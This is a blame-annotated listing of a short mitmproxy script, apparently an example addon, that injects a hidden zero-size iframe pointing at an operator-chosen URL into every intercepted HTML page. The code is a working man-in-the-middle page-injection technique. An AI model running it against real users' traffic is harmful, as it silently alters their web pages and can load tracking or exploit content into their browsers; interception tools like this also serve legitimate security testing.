2014-09-05 13:05:44 +00:00
|
|
|
# Usage: mitmdump -s "iframe_injector.py url"
|
|
|
|
# (this script works best with --anticache)
|
2016-06-14 01:17:09 +00:00
|
|
|
import sys
|
2014-09-12 00:42:45 +00:00
|
|
|
from bs4 import BeautifulSoup
|
2014-09-05 13:05:44 +00:00
|
|
|
|
2016-07-22 23:57:31 +00:00
|
|
|
|
|
|
|
class Injector:
|
|
|
|
def __init__(self, iframe_url):
|
|
|
|
self.iframe_url = iframe_url
|
|
|
|
|
|
|
|
def response(self, flow):
|
|
|
|
if flow.request.host in self.iframe_url:
|
|
|
|
return
|
2016-12-10 11:06:33 +00:00
|
|
|
html = BeautifulSoup(flow.response.content, "html.parser")
|
2016-07-22 23:57:31 +00:00
|
|
|
if html.body:
|
|
|
|
iframe = html.new_tag(
|
|
|
|
"iframe",
|
|
|
|
src=self.iframe_url,
|
|
|
|
frameborder=0,
|
|
|
|
height=0,
|
|
|
|
width=0)
|
|
|
|
html.body.insert(0, iframe)
|
|
|
|
flow.response.content = str(html).encode("utf8")
|
2014-09-05 13:05:44 +00:00
|
|
|
|
2016-07-08 01:37:33 +00:00
|
|
|
|
2017-03-23 21:15:41 +00:00
|
|
|
def load(opts):
|
2016-06-14 01:17:09 +00:00
|
|
|
if len(sys.argv) != 2:
|
2014-09-05 13:05:44 +00:00
|
|
|
raise ValueError('Usage: -s "iframe_injector.py url"')
|
2016-07-22 23:57:31 +00:00
|
|
|
return Injector(sys.argv[1])
|